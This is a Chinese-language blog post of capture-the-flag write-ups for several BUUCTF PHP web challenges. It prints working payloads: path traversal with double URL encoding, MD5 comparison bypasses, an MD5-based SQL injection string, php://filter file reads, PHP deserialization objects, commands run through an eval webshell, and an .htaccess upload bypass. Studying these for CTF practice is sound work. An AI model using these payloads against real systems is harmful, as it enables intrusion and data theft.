

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/kele6.github.io/img/fluid.png">
  <link rel="icon" href="/kele6.github.io/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="BUUCTF[HCTF 2018]WarmUp(代码审计)源代码&#x3D;&#x3D;&gt;source.php&#x3D;&#x3D;&#x3D;&gt;hint.php&#x3D;&#x3D;&gt;flag not here, and flag in ffffllllaaaagggg&#x3D;&#x3D;&gt;说明flag可能在文件ffffllllaaaagggg 解析source.">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF">
<meta property="og:url" content="https://junske51.github.io/kele6.github.io/2024/04/14/BUUCTF/index.html">
<meta property="og:site_name" content="可乐">
<meta property="og:description" content="BUUCTF[HCTF 2018]WarmUp(代码审计)源代码&#x3D;&#x3D;&gt;source.php&#x3D;&#x3D;&#x3D;&gt;hint.php&#x3D;&#x3D;&gt;flag not here, and flag in ffffllllaaaagggg&#x3D;&#x3D;&gt;说明flag可能在文件ffffllllaaaagggg 解析source.">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-04-14T13:42:14.577Z">
<meta property="article:modified_time" content="2024-04-15T15:08:30.677Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>BUUCTF - 可乐</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/kele6.github.io/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/kele6.github.io/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/kele6.github.io/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"junske51.github.io","root":"/kele6.github.io/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/kele6.github.io/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/kele6.github.io/js/utils.js" ></script>
  <script  src="/kele6.github.io/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/kele6.github.io/">
      <strong>kele</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/kele6.github.io/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/kele6.github.io/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/kele6.github.io/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/kele6.github.io/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/kele6.github.io/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/kele6.github.io/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="BUUCTF"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-04-14 21:42" pubdate>
          April 14, 2024 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.6k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          23 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">BUUCTF</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="BUUCTF"><a href="#BUUCTF" class="headerlink" title="BUUCTF"></a>BUUCTF</h1><h2 id="HCTF-2018-WarmUp-代码审计"><a href="#HCTF-2018-WarmUp-代码审计" class="headerlink" title="[HCTF 2018]WarmUp(代码审计)"></a>[HCTF 2018]WarmUp(代码审计)</h2><p>源代码&#x3D;&#x3D;&gt;source.php&#x3D;&#x3D;&#x3D;&gt;hint.php&#x3D;&#x3D;&gt;<strong>flag not here, and flag in ffffllllaaaagggg</strong>&#x3D;&#x3D;&gt;说明flag可能在文件ffffllllaaaagggg</p>
<p>解析source.php的代码<br><code>if (! empty($_REQUEST[&#39;file&#39;])       &amp;&amp; is_string($_REQUEST[&#39;file&#39;])&amp;&amp; emmm::checkFile($_REQUEST[&#39;file&#39;])    ) &#123;       include $_REQUEST[&#39;file&#39;];exit;&#125; else &#123;echo &quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;;&#125;</code><br>一步步解析：<br>$_REQUEST</p>
<pre><code class="hljs">    变量 $_REQUEST用于收集HTML表单提交的数据，默认情况下包含了$_GET，$_POST和$_COOKIE的数组。

    GET是从服务器上获取数据，GET是把参数数据队列加到提交表单的ACTION属性所指的URL中，值和表单内各个字段一一对应，在URL中可以看到。

    POST是向服务器传送数据，POST是通过HTTP POST机制，将表单内各个字段与其内容放置在HTML HEADER内一起传送到ACTION属性所指的URL地址，用户看不到这个过程。

    通过POST和GET方法提交的所有数据都可以通过$_REQUEST[&quot;参数&quot;]获得。
</code></pre>
<p>empty()</p>
<pre><code class="hljs">    empty(var) 函数用于检查一个变量是否为空，当 变量var 存在，并且是一个非空非零的值时返回 FALSE 否则返回 TRUE。
</code></pre>
<p>is_string()</p>
<pre><code class="hljs">    is_string(var)检测变量是否是字符串，如果var是字符串则返回true，否则返回false。
</code></pre>
<p>include</p>
<pre><code class="hljs">    include语句包含并运行指定文件。

    文件查找过程：

    1、被包含文件先按参数给出的路径寻找。

    2、如果没有给出目录（只有文件名）时则按照include_path指定的目录寻找。

    3、如果在include_path下没找到该文件，则include最后才在调用脚本文件所在的目录和当前工作目录下寻找。

    4、如果最后仍未找到文件则include会发出一条警告。
</code></pre>
<p>逻辑结构</p>
<pre><code class="hljs">    传入的file参数需满足以下3个条件，才可包含并运行file：

    （1）不为空

    （2）为字符串

    （3）emmm::checkFile($_REQUEST[&#39;file&#39;]) 返回 true
</code></pre>
<p>mb_substr()</p>
<pre><code class="hljs">    mb_substr ( string $str , int $start , int $length )        

    mb_substr() 函数从$str的$start字符位置开始，截断$length个字符并返回字符串。$str的第一个字符的位置是 0，第二个字符的位置是 1，以此类推。

    类似substr() 函数，substr() 函数只针对英文字符，如果要分割的中文文字则需要使用 mb_substr()。
</code></pre>
<p><strong>mb_strpos()</strong></p>
<p>​    <code>mb_strpos(haystack, needle)，查找字符串needle在另一个字符串haystack中首次出现的位置，返回位置(int)。第一个字符的位置是 0，第二个字符的位置是 1，以此类推。</code></p>
<p><code>$_page = mb_substr(     $page,     0,     mb_strpos($page . &#39;?&#39;, &#39;?&#39;) ); $_page = urldecode($page);</code><br><code>$_page = mb_substr(     $_page,</code><br>    <code>0,</code><br>    <code>mb_strpos($_page . &#39;?&#39;, &#39;?&#39;)</code><br><code>);</code></p>
<p>if语句中的$_page经历了如下改变：一次问号截断，一次url解码，一次问号截断——–url传入服务器会自动进行一次urldecode.  ?的url编码为%3F，双重url编码为%253F。</p>
<p>那问题就很容易解决了<br>payload:?file&#x3D;source.php%253F&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;ffffllllaaaagggg——-..&#x2F;代表返回上级目录——–..&#x2F;是一个一个试的，未知有几个文件夹</p>
<h2 id="MRCTF2020-Ez-bypass-md5"><a href="#MRCTF2020-Ez-bypass-md5" class="headerlink" title="MRCTF2020]Ez_bypass(md5)"></a>MRCTF2020]Ez_bypass(md5)</h2><p><strong>代码审计</strong><br>&#x2F;&#x2F; 包含外部文<br>件 ‘flag.php’，该文件可能包含敏感信息<br>include ‘flag.php’;<br>&#x2F;&#x2F; 定义一个变量 $flag，包含一个字符串<br>$flag &#x3D; ‘MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}’;</p>
<p>&#x2F;&#x2F; 检查是否存在名为 ‘gg’ 和 ‘id’ 的 GET 参数<br>if(isset($_GET[‘gg’]) &amp;&amp; isset($_GET[‘id’])) {<br>    &#x2F;&#x2F; 获取 GET 参数 ‘id’ 和 ‘gg’ 的值<br>    $id &#x3D; $_GET[‘id’];<br>    $gg &#x3D; $_GET[‘gg’];</p>
<pre><code class="hljs">// 检查 $id 和 $gg 的 MD5 散列值是否相等，并且它们的值不相等，强比较
if (md5($id) === md5($gg) &amp;&amp; $id !== $gg) &#123;
    // 输出 &#39;You got the first step&#39;
    echo &#39;You got the first step&#39;;
 
    // 检查是否存在名为 &#39;passwd&#39; 的 POST 参数
    if(isset($_POST[&#39;passwd&#39;])) &#123;
        // 获取 POST 参数 &#39;passwd&#39; 的值
        $passwd = $_POST[&#39;passwd&#39;];
 
        // 检查 $passwd 是否为数字
        if (!is_numeric($passwd)) &#123;
            // 如果 $passwd 等于 1234567，则输出 &#39;Good Job!&#39;，显示 &#39;flag.php&#39; 的内容，然后终止脚本执行
            if($passwd == 1234567) &#123;
                echo &#39;Good Job!&#39;;
                highlight_file(&#39;flag.php&#39;);
                die(&#39;By Retr_0&#39;);
            &#125; else &#123;
                // 如果 $passwd 不等于 1234567，则输出 &#39;can you think twice??&#39;
                echo &quot;can you think twice??&quot;;
            &#125;
        &#125; else &#123;
            // 如果 $passwd 是数字，则输出 &#39;You can not get it !&#39;  可以数字+字母 如：12345a
            echo &#39;You can not get it !&#39;;
        &#125;
    &#125; else &#123;
        // 如果不存在 POST 参数 &#39;passwd&#39;，则输出 &#39;only one way to get the flag&#39;
        die(&#39;only one way to get the flag&#39;);
    &#125;
&#125; else &#123;
    // 如果 $id 和 $gg 的 MD5 散列值不相等，或者它们的值相等，则输出 &#39;You are not a real hacker!&#39;
    echo &quot;You are not a real hacker!&quot;;
&#125;
</code></pre>
<p>} else {<br>    &#x2F;&#x2F; 如果不存在 ‘gg’ 和 ‘id’ 的 GET 参数，则输出 ‘Please input first’<br>    die(‘Please input first’);<br>}<br><strong>很常见的md5比较</strong><br><code>若为弱比较：</code></p>
<p><code>md5加密后为0e开头的会被识别为科学记数法，结果均为0</code></p>
<p><code>例如：para1=QNKCDZO ，para2=aabg7XSs</code></p>
<p><code>md5（para1）=0e830400451993494058024219903391</code></p>
<p><code>md5（para2）=0e087386482136013740957780965295</code></p>
<p><code>此时MD5（para1）== MD5（para2）</code></p>
<p>另加：数组绕过&#x2F;?id[]&#x3D;1&amp;gg[]&#x3D;222</p>
<p><code>若为强比较：</code></p>
<p><code>如果传入的两个参数不是字符串，而是数组，md5()函数无法解出其数值，并且不会报错，就会得到===强比较的值相等</code></p>
<p><code>例如：para1[]=111  ,  para2[]=222</code></p>
<p><code>此时md5（para1）=== md5（para2）</code><br>显而易见 payload：&#x2F;?id[]&#x3D;1&amp;gg[]&#x3D;2  POST:passwd&#x3D;1234567a</p>
<h2 id="极客大挑战-2019-Http"><a href="#极客大挑战-2019-Http" class="headerlink" title="[极客大挑战 2019]Http"></a>[极客大挑战 2019]Http</h2><p>源代码：发现秘密：Secret.php</p>
<p>It doesn’t come from ‘<a target="_blank" rel="noopener" href="https://Sycsecret.buuoj.cn'==>Referer">https://Sycsecret.buuoj.cn&#39;==&gt;Referer</a></p>
<p>Please use “Syclover” browser&#x3D;&#x3D;&gt;Uesr Agent </p>
<p>No!!! you can only read this locally!!!&#x3D;&#x3D;&gt;X-Forwarded-For: 127.0.0.1<br>(另几种表达：X-Real-Ip: 127.0.0.1   Client-Ip: 127.0.0.1)</p>
<h2 id="BJDCTF2020-Easy-MD5"><a href="#BJDCTF2020-Easy-MD5" class="headerlink" title="[BJDCTF2020]Easy MD5"></a>[BJDCTF2020]Easy MD5</h2><p>随便查询，无回响，查看源码，发现：<!-- /header end -->HTTP有header&#x3D;&#x3D;&gt;发现<em>Hint select * from ‘admin’ where password&#x3D;md5($pass,true)</em></p>
<p>一个sql语句，要输入一个密码但是并不知道正确密码。这里需要利用md5绕过，让sql语句变成如下形式  <strong>select * from ‘admin’ where password&#x3D;‘’ or ‘1</strong>（很基本的sql）</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/redfish404/articles/17878453.html">https://www.cnblogs.com/redfish404/articles/17878453.html</a></p>
<p>上网查找后发现字符串“<strong>ffifdyop</strong>”和“129581926211651571912466741651878684928”在进行<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=md5%E5%8A%A0%E5%AF%86&spm=1001.2101.3001.7020">md5加密</a>后形成的十六进制的字符串经过mysql转换成十进制后对应的ASCII码内容为“or ‘ 6……”——ffifdyop-&gt;276f722736c95d99e921722cf9ed621c-&gt;’or’6É]é!r,ùíb</p>
<p>进入新页面，什么也没有，查看源代码</p>
<figure class="highlight haxe"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs haxe"><span class="hljs-variable">$a</span> = <span class="hljs-variable">$GET</span>[<span class="hljs-string">&#x27;a&#x27;</span>];<br><span class="hljs-variable">$b</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;b&#x27;</span>];<br><br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$a</span> != <span class="hljs-variable">$b</span> &amp;&amp; md5(<span class="hljs-variable">$a</span>) == md5(<span class="hljs-variable">$b</span>))&#123;<br>    <span class="hljs-comment">// wow, glzjin wants a girl friend.</span><br></code></pre></td></tr></table></figure>



<p>很基本的md5&#x3D;&#x3D;&gt;0e绕过或者数组绕过都行&#x3D;&#x3D;进入下一步</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML"> &lt;?phperror_reporting(0);include &quot;flag.php&quot;;<br>highlight_file(__FILE__);<br>if($_POST[&#x27;param1&#x27;]!==$_POST[&#x27;param2&#x27;]&amp;&amp;md5($_POST[&#x27;param1&#x27;])===md5($_POST[&#x27;param2&#x27;]))<br>&#123;  echo $flag;&#125; <br></code></pre></td></tr></table></figure>

<p>这个只能数组绕过&#x3D;&#x3D;&gt;param1[]&#x3D;1&amp;param2[]&#x3D;2</p>
<h2 id="极客大挑战-2019-Secret-File-信息泄露、文件包含"><a href="#极客大挑战-2019-Secret-File-信息泄露、文件包含" class="headerlink" title="[极客大挑战 2019]Secret File(信息泄露、文件包含)"></a>[极客大挑战 2019]Secret File(信息泄露、文件包含)</h2><p>页面什么也没有，查看源代码&#x3D;&#x3D;&gt;href&#x3D;”.&#x2F;Archive_room.php”</p>
<p>打开，点击按钮，提示“没看清么？回去再仔细看看吧。”</p>
<p>让我们退回去仔细看看，说明在这两个页面之间存在一些内容，右键「检查」<br>返回上一个页面（Archive_room.php）重新点击一次 SECRET 按钮，观察这一过程有哪些「请求」&#x3D;&#x3D;&gt;在结束页面之前，还访问了一个页面&#x2F;action.php，只是我们没有「权限」（302），看不了，所以直接跳过了这个页面。针对这种情况，使用<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=burp&spm=1001.2101.3001.7020">burp</a>抓包进行访问<br>发现   secr3t.php   </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>  <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);  <span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);  <span class="hljs-variable">$file</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;file&#x27;</span>];  <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">strstr</span>(<span class="hljs-variable">$file</span>,<span class="hljs-string">&quot;../&quot;</span>)||<span class="hljs-title function_ invoke__">stristr</span>(<span class="hljs-variable">$file</span>,<span class="hljs-string">&quot;tp&quot;</span>)||<span class="hljs-title function_ invoke__">stristr</span>(<span class="hljs-variable">$file</span>,<span class="hljs-string">&quot;input&quot;</span>)||<span class="hljs-title function_ invoke__">stristr</span>(<span class="hljs-variable">$file</span>,<span class="hljs-string">&quot;data&quot;</span>))<br>&#123;    <br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Oh no!&quot;</span>; <br>   <span class="hljs-keyword">exit</span>();  &#125; <br> <span class="hljs-keyword">include</span>(<span class="hljs-variable">$file</span>); <br><span class="hljs-comment">//flag放在了flag.php里?&gt;</span><br></code></pre></td></tr></table></figure>

<p>使用PHP伪协议对文件内容进行编码：&#x2F;secr3t.php?file&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php&#x3D;&#x3D;&gt;base64解码</p>
<h2 id="极客大挑战-2019-PHP（反序列化）"><a href="#极客大挑战-2019-PHP（反序列化）" class="headerlink" title="[极客大挑战 2019]PHP（反序列化）"></a>[极客大挑战 2019]PHP（反序列化）</h2><p>备份网站&#x3D;&#x3D;&gt;dirsezrch -u <a target="_blank" rel="noopener" href="http://ae4f66fd-39d2-4ca2-93f2-e3b29093f58c.node5.buuoj.cn:81/==%3Ewww.zip%E6%96%87%E4%BB%B6(%E7%9B%B4%E6%8E%A5%E5%9C%A8url%E7%BD%91%E5%9D%80%E5%90%8E%E9%9D%A2%E6%8B%BC%E6%8E%A5%E5%B0%B1%E5%8F%AF%E4%BB%A5)">http://ae4f66fd-39d2-4ca2-93f2-e3b29093f58c.node5.buuoj.cn:81/==&gt;www.zip文件(直接在url网址后面拼接就可以)</a></p>
<p>文件夹源码挨个看</p>
<p>index.php<br><code>&lt;?php</code></p>
<p>  <code>include &#39;class.php&#39;;</code></p>
<p>  <code>$select = $_GET[&#39;select&#39;];</code></p>
<p>  <code>$res=unserialize(@$select);</code></p>
<p>  <code>?&gt;</code></p>
<p>class.php(经过删减)</p>
<p>&lt;<code>?php</code></p>
<p><code>include &#39;flag.php&#39;;</code></p>
<p><code>class Name&#123;</code></p>
<p>  <code>private $username = &#39;nonono&#39;;</code></p>
<p><code>private $password = &#39;yesyes&#39;;</code></p>
<p><code>public function __construct($username,$password)&#123;</code></p>
<p>​    <code>$this-&gt;username = $username;</code></p>
<p>​    <code>$this-&gt;password = $password; &#125;</code></p>
<p> <code>function __wakeup()&#123;</code></p>
<p>​    <code>$this-&gt;username = &#39;guest&#39;;</code></p>
<p>  <code>&#125;</code></p>
<p> <code>function __destruct()&#123;</code></p>
<p>​    <code>if ($this-&gt;password != 100) &#123;</code></p>
<p>​      <code>echo &quot;&lt;/br&gt;NO!!!hacker!!!&lt;/br&gt;&quot;;</code></p>
<p>​      <code>echo &quot;You name is: &quot;;</code></p>
<p>​      <code>echo $this-&gt;username;echo &quot;&lt;/br&gt;&quot;;</code></p>
<p>​      <code>echo &quot;You password is: &quot;;</code></p>
<p>​      <code>echo $this-&gt;password;echo &quot;&lt;/br&gt;&quot;;</code></p>
<p>​      <code>die();</code></p>
<p>​    <code>&#125;</code></p>
<p>​    <code>if ($this-&gt;username === &#39;admin&#39;) &#123;</code></p>
<p>​      <code>global $flag;</code></p>
<p>​      <code>echo $flag;</code></p>
<p>​    <code>&#125;else&#123;</code></p>
<p>​      <code>echo &quot;&lt;/br&gt;hello my friend~~&lt;/br&gt;sorry i can&#39;t give you the flag!&quot;;</code></p>
<p>​      <code>die();</code></p>
<p>**在反序列化时，当前属性个数大于实际属性个数时，就会跳过__wakeup(),去执行___destruct<br>思路明确了</p>
<p>当password为100，username为admin时即可获得flag</p>
<p>故以get传参为跳板本地构造原始POC：</p>
<p>?select&#x3D;O:4:”Name”:2:{s:13:” Name username”;s:5:”admin”;s:13:” Name password”;s:3:100;}</p>
<p>?select&#x3D;O:4:”Name”:2:{s:13:” Name username”;s:5:”admin”;s:13:” Name password”;s:3:100;}<br>仍然不行  </p>
<p>可能空格没有被实体化  这里我们需要把空格写出来<br> 而空格的url编码是%00，下面构造我们的payload </p>
<p>?select&#x3D;O:4:”Name”:3 {s:14:”%00Name%00username”;s:5:”admin”;s:14:”%00Name%00password”;s:3:”100”;}</p>
<h2 id="极客大挑战-2019-Knife-一句话木马、代码执行"><a href="#极客大挑战-2019-Knife-一句话木马、代码执行" class="headerlink" title="[极客大挑战 2019]Knife(一句话木马、代码执行)"></a>[极客大挑战 2019]Knife(一句话木马、代码执行)</h2><h5 id="Way1（代码执行）"><a href="#Way1（代码执行）" class="headerlink" title="Way1（代码执行）"></a>Way1（代码执行）</h5><p>显示 eval($_POST[“Syc”]);<br>POST: Syc&#x3D;var_dump(scandir(‘&#x2F;‘));—查看源代码 发现flag</p>
<h5 id="Way2（蚁剑）"><a href="#Way2（蚁剑）" class="headerlink" title="Way2（蚁剑）"></a>Way2（蚁剑）</h5><p>复制URL 密码：Syc  找flag文件</p>
<h2 id="MRCTF2020-你传你🐎呢-上传木马-抓包改后缀-htaccess绕过"><a href="#MRCTF2020-你传你🐎呢-上传木马-抓包改后缀-htaccess绕过" class="headerlink" title="[MRCTF2020]你传你🐎呢(上传木马+抓包改后缀+.htaccess绕过)"></a>[MRCTF2020]你传你🐎呢(上传木马+抓包改后缀+.htaccess绕过)</h2><p>随便上传，有限制 尝试了php3,php5,ptml,空格绕过,都不行</p>
<p>先上次1.png   &#x2F;&#x2F;与后面的png文件名一致</p>
<p>尝试.htaccess</p>
<p>内容：<br>&lt;FilesMatch “1.png”&gt;<br>SetHandler application&#x2F;x-httpd-php<br></FilesMatch></p>
<p>抓包&#x3D;&#x3D;&gt;Content-Type: image&#x2F;png</p>
<p>复制网址：&#x2F;upload&#x2F;731ae4223a74740c27bb86b66c482220&#x2F;<strong>.htaccess</strong></p>
<p>改为&#x2F;upload&#x2F;731ae4223a74740c27bb86b66c482220&#x2F;<strong>1.png</strong></p>
<p>踩坑：<em>这里要把.htaccess改为1.png，因为密码cmd是对应的1.png</em></p>
<h2 id="极客大挑战-2019-BuyFlag（数组绕过长度限制）"><a href="#极客大挑战-2019-BuyFlag（数组绕过长度限制）" class="headerlink" title="[极客大挑战 2019]BuyFlag（数组绕过长度限制）"></a>[极客大挑战 2019]BuyFlag（数组绕过长度限制）</h2><p>If you want to buy the FLAG:<br>                                 You must be a student from CUIT!!!<br>                                 You must be answer the correct password!!! 	 							</p>
<p>源代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php">&lt;!--<br>	~~~post money <span class="hljs-keyword">and</span> password~~~<br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;password&#x27;</span>])) &#123;<br>	<span class="hljs-variable">$password</span> = <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;password&#x27;</span>];<br>	<span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">is_numeric</span>(<span class="hljs-variable">$password</span>)) &#123;<br>		<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;password can&#x27;t be number&lt;/br&gt;&quot;</span>;<br>	&#125;<span class="hljs-keyword">elseif</span> (<span class="hljs-variable">$password</span> == <span class="hljs-number">404</span>) &#123;<br>		<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Password Right!&lt;/br&gt;&quot;</span>;<br></code></pre></td></tr></table></figure>

<p>password&#x3D;404a     绕过</p>
<p>查看HTTP 发现Cookie: user&#x3D;0     0改为1试试</p>
<p>显示：Pay for the flag!!!hacker!!!</p>
<p>突然想起来money还要够</p>
<p>password&#x3D;404a&amp;money&#x3D;100000000</p>
<p>显示 Nember lenth is too long</p>
<p>钱减少还不够</p>
<p>可以尝尝9e9  <strong>password&#x3D;404a&amp;money&#x3D;9e9</strong></p>
<p>还有一个比较常见的数组绕过    <strong>password&#x3D;404a&amp;money[]&#x3D;1</strong></p>
<h2 id="网鼎杯-2020-青龙组-AreUSerialz（反序列化）"><a href="#网鼎杯-2020-青龙组-AreUSerialz（反序列化）" class="headerlink" title="[网鼎杯 2020 青龙组]AreUSerialz（反序列化）"></a>[网鼎杯 2020 青龙组]AreUSerialz（反序列化）</h2><p>构造POP链</p>
<p>不使用题目中原有的各个字段的protect属性，因为这样会使得序列化后的字符串出现不可打印字符，而题目中的is_valid()函数又会检验输入的字符串中是否有不可打印字符，因此，我们这里把protect属性修改为public。</p>
<?php

class FileHandler {

  public $op=2;

  public $filename="./flag.php";

  public $content;

  }

$a=new FileHandler;

$str1=serialize($a);

echo $str1;

?>

<p>O:11:”FileHandler”:3:{s:2:”op”;i:2;s:8:”filename”;s:10:”.&#x2F;flag.php”;s:7:”content”;N;}</p>
<p>payload： ?str&#x3D;O:11:”FileHandler”:3:{s:2:”op”;i:2;s:8:”filename”;s:10:”.&#x2F;flag.php”;s:7:”content”;N;}</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>BUUCTF</div>
      <div>https://junske51.github.io/kele6.github.io/2024/04/14/BUUCTF/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>April 14, 2024</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
